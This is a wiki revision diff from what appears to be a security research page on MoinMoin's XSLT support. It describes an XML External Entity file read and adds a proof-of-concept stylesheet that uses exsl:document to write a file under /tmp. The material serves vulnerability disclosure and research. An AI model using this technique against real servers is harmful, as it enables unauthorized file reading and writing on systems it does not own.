Changes for page Application_MoinMoin

Last modified by Nicolas Gregoire on 2012/01/29 17:56
From version Icon 3.1 Icon
edited by Nicolas Gregoire
on 2012/01/24 22:08
Change comment: Upload new attachment XsltReadFile
To version Icon 4.1 Icon
edited by Nicolas Gregoire
on 2012/01/24 22:20
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -1,7 +1,23 @@
1 -By default, the 'allow_xslt' configuration option is set to False. if this option is set to True, then "read/write/overwrite arbitrary path/file as the moin process uid/gidarbitrary" is possible. This is triggered by inserting then displaying wiki pages containing XSLT code.
1 += Introduction =
2 2  
3 +Dixit [[Wikipedia>>http://en.wikipedia.org/wiki/Moinmoin]], "MoinMoin is a wiki engine implemented in Python, initially based on the PikiPiki wiki engine. The MoinMoin code is licensed under the GNU General Public License v2, or (at the user's option) any later version (except some 3rd party modules that are licensed under other Free Software licenses compatible with the GPL). A number of organizations use MoinMoin to run public wikis, including notable free software projects Ubuntu, Apache, Debian, FreeBSD, and others."
3 3  
4 -This was documented in version 1.9.3 :
5 += Vulnerabilities =
6 +
7 +By default, the 'allow_xslt' configuration option is set to False. __If__ this option is set to True, then "read/write/overwrite arbitrary path/file as the moin process uid/gidarbitrary" is possible. These bugs are triggered by inserting then displaying wiki pages containing XSLT code.
8 +
9 +
10 +This behavior was documented in version 1.9.3 :
5 5  http://moinmo.in/SecurityFixes
6 6  http://hg.moinmo.in/moin/1.9/rev/99e2309a7ec0
7 7  
14 += File disclosure =
15 +
16 +Using a XML External Entity attack, it is possible to read text files ([[PoC>>attach:XsltReadFile]]).
17 +
18 +__Note__ : I was unable to abuse the doc-as-string() extension function because of the MoinMoin URL Resolver. I didn't soend much time on it, given that a XEE vulnerability was already found.
19 +
20 += File creation =
21 +
22 +As described in the [[4Suite>>Engine_4Suite]] page, the <exsl:document> extension element allows file creation ([[PoC>>attach:XsltCreateFile]])
23 +
Icon XsltCreateFile
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +438 bytes
Content
... ... @@ -1,0 +1,13 @@
1 +<?xml version="1.0"?>
2 +<?xml-stylesheet href="XsltCreateFile" type="text/xml"?>
3 +<xsl:stylesheet version="1.0"
4 +xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
5 +xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl" >
6 + <xsl:template match="/">
7 + Writing to disk ...
8 + <exsl:document href="file:///tmp/dropped_by_moin" method="text">
9 + Dropped to disk
10 + </exsl:document>
11 + </xsl:template>
12 +</xsl:stylesheet>
13 +